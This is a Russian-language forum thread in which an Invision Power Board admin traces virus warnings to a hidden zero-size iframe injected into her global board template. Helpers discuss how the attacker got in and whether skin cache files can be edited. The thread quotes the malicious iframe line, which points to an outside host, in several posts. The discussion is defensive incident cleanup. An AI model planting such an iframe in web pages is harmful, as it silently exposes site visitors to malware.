Перейти к контенту
  • 0

Троян Backdoor на форуме


ElenaI

Вопрос

Странная ситуация - вылавливают его не все юзеры, меньшинство, но сам факт меня озадачил. Прошлась по файлам - никаких изменений с апреля, а вирусные предупреждения начались в августе. Попросила очень занятого программиста хоть глазком одним посмотреть, что за чертовщина. Он "глянул рендерный текст" и вот чего узрел прямо после хедера:

<!-- / End board header -->

<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

 

Вопрос такой - ГДЕ искать эту строку? в каких файлах? Голову сломала уже :D

Версия форума 2.2.2, лицензионная

Ссылка на комментарий
Поделиться на других сайтах

  • Ответы 60
  • Создана
  • Последний ответ

Лучшие авторы в этом вопросе

Лучшие авторы в этом вопросе

Загружено фотографий

Рекомендуемые сообщения

  • 0

Друзья мои, ОГРОМНОЕ спасибо за поддержку и предложенную помощь.

Представьте себе, я таки нашла эту дрянь! Она сидела в общем шаблоне форума, куда я даже не догадалась полезть (смотрела в html шаблонах, как рекомендовали, а на этот не обратила внимание)... Господи, как же все было просто :D

Вот оно:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="content-type" content="text/html; charset=<% CHARSET %>" />

<link rel="shortcut icon" href="favicon.ico" />

<title><% TITLE %></title>

<% GENERATOR %>

<% CSS %>

<% JAVASCRIPT %>

</head>

<body>

<div id="ipbwrapper">

<% BOARD HEADER %>

<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

<% MEMBER BAR %>

<% NAVIGATION %>

<!--IBF.NEWPMBOX-->

<% BOARD %>

<% BOARD FOOTER %>

<% STATS %>

<% COPYRIGHT %>

</div>

</body>

</html>

 

В общем, всем спасибо. Я серьезно.

Только у меня вопрос - эту строку я просто удалила, но теперь при ответах в форум страница грузится с ошибкой - требуется объект (а раньше на той строке был прописан вирус, и мой комп его запрещал). Кто-нить мог бы у себя в админке глянуть - на месте выделенного мною жирным шрифтом у вас что-то прописано? Не урл ли форума?

Ссылка на комментарий
Поделиться на других сайтах

  • 0
<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

У меня этой строки вообще нет.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

2 ElenaI Как взломали незнаю лень лог читать/ Но после фикса такого уже небsло.

 

Как на меня, то вам нужно забєкапить базу; переставить форум; следить за обновлениями.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
ЕленаI туда нужно было посмотреть в первую очередь.
Ссылка на комментарий
Поделиться на других сайтах

  • 0
ЕленаI туда нужно было посмотреть в первую очередь.

Было бы здорово услышать этот ответ от техподдержки не постфактум, когда решение проблемы найдено, а в тот момнт, когда я отправила к вам письмо с вопросом по этой проблеме. Техподдержка же порекомендовала просканировать шаблон хедера и на этом все закончилось. :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0

После того, как удалили эту строку. ОБЯЗАТЕЛЬНО смените пароли на фтп. После этого проверьте свой комп на вирусы. А вообще лучше не хранить пароли к фтп в прогах. Лучше гденить их записывать, а потом просто вставлять в адрес строку с доступом...

Но это точно сидело на вашем компе и стырило пароли от фтп...

Ссылка на комментарий
Поделиться на других сайтах

  • 0
После того, как удалили эту строку. ОБЯЗАТЕЛЬНО смените пароли на фтп. После этого проверьте свой комп на вирусы. А вообще лучше не хранить пароли к фтп в прогах. Лучше гденить их записывать, а потом просто вставлять в адрес строку с доступом...

Но это точно сидело на вашем компе и стырило пароли от фтп...

Да, спасибо. Пароли я сменила сразу, как выяснилось, что на форме вирус. Но меня мучает один вопрос: строку вписали в общий шаблон форума, а его в физическом виде по FTP разве можно достать? Я не очень в этом разбираюсь, поэтому прошу прощеняи за глупый вопрос, но мне казалось, что с шаблонами форума можно работать только через админку форума, по крайней мере, с общим шаблоном... :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0
На ФТП его не достать. Так что или узнали пароль от БД(маловероятно), либо пароль админа. Проверьте что у вас стоят все обновления безопасности(ссылка в подписи: Wiki).
Ссылка на комментарий
Поделиться на других сайтах

  • 0
В кеше нет Глобального шаблона :D
Ссылка на комментарий
Поделиться на других сайтах

  • 0
В кеше нет Глобального шаблона ;)

skin_global.php ... например я выбрал папку cacheid_2.... пропиши что-нибудь(лол там и т.д. :D ) на 395(например) строке файла и посмотри на результат ))

Ссылка на комментарий
Поделиться на других сайтах

  • 0
ЕленаI туда нужно было посмотреть в первую очередь.

Было бы здорово услышать этот ответ от техподдержки не постфактум, когда решение проблемы найдено, а в тот момнт, когда я отправила к вам письмо с вопросом по этой проблеме. Техподдержка же порекомендовала просканировать шаблон хедера и на этом все закончилось. :D

Я не техподдержка

 

Nonamers

 

глобальный шаблон форума (Board Wrapper) не хранится в skin_global

Ссылка на комментарий
Поделиться на других сайтах

  • 0
глобальный шаблон форума (Board Wrapper) не хранится в skin_global

я просто говорил что через файлы кеша можно прописать хоть что... а не обязательно через админку

Ссылка на комментарий
Поделиться на других сайтах

  • 0

ещё раз: глобальный шаблон форума не хранится ни в файловом кеше (skin_*.php), ни в БД кеше (cache_store).

Поэтому его нельзя изменить сказанными вами способом.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

ну ты как маленький =)

я ж не просто так спорю, а смотрю код форума и вижу откуда там чего берётся.

 

ну ок, покажи, что именно и где именно ты менял в skin_*.php

Ссылка на комментарий
Поделиться на других сайтах

  • 0

cache\skin_cache\cacheid_2\

 

skin_global.php

 

<!-- Msg Layer -->
<div id='ipd-msg-wrapper'>
<div id='ipd-msg-title'>
	<a href='#' onclick='document.getElementById(\"ipd-msg-wrapper\").style.display=\"none\"; return false;'><img src='style_images/<#IMG_DIR#>/close.png' alt='X' title='Close Window' class='ipd' /></a>   <strong>{$this->ipsclass->lang['gbl_sitemsg_header']}</strong>
</div>
<div id='ipd-msg-inner'><span style='font-weight:bold' id='ipd-msg-text'></span><div class='pp-tiny-text'>{$this->ipsclass->lang['gbl_auto_close']}</div></div>
</div>
<!-- Msg Layer -->
") : ("")) . "
[b][color="#FF0000"]test[/color][/b]
<!-- / End board header -->";

 

http://rl.foto.radikal.ru/0709/4a/a5dfc2030b2et.jpg

 

p.s. версия 2.3.1

Ссылка на комментарий
Поделиться на других сайтах

  • 0

ну так это не глобальный шаблон форума.

Глобальный шаблон форума вот:

post-1993-1188925815_thumb.jpg

Он не хранится в кеше.

 

Так что

В кеше нет Глобального шаблона :D

совершенно верно.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

да че ты пристал со своим глобальным шаблоном :D)) не в этом суть была ;)

да и с правами тут проблемы - кроме администрации и вас никто не может смотреть вложения

Ссылка на комментарий
Поделиться на других сайтах

  • 0
да че ты пристал со своим глобальным шаблоном

Как "чего это я пристал".

Елена нашла следы именно в глобальном шаблоне, а не в где-то в skin_*.php. Саннис говорил тебе про глобальный шаблон. Говорил что нет его в кеше, ты спорил. Я согласился с ним.

да и с правами тут проблемы - кроме администрации и вас никто не может смотреть вложения

ок, вот http://forum.sysman.ru/uploads/at/7/post-22-1188926329_thumb.jpg

 

skin_global.php это не есть глобальный шаблон форума.

Это игра слов, не более.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

вообще, я отвечал на этот вопрос :D

Но меня мучает один вопрос: строку вписали в общий шаблон форума, а его в физическом виде по FTP разве можно достать?

 

ну да ладно ;) забили

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Нельзя его достать физически по FTP.

А skin_global.php, про который вы привели пример физической записи - это не то, про что она имела ввиду.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Пойми, что

 

Но меня мучает один вопрос: строку вписали в общий шаблон форума, а его в физическом виде по FTP разве можно достать?

 

"строку вписали в общий шаблон форума" - это как раз глобальный шаблон форума.

"а его в физическом виде по FTP разве можно достать" - "а его [глобальный шаблон] разве можно физически достать?" - ответ "Нет"

 

 

Ты привёл пример записи в skin_global.php это не общий шаблон, и она не про него говорила.

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...

×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.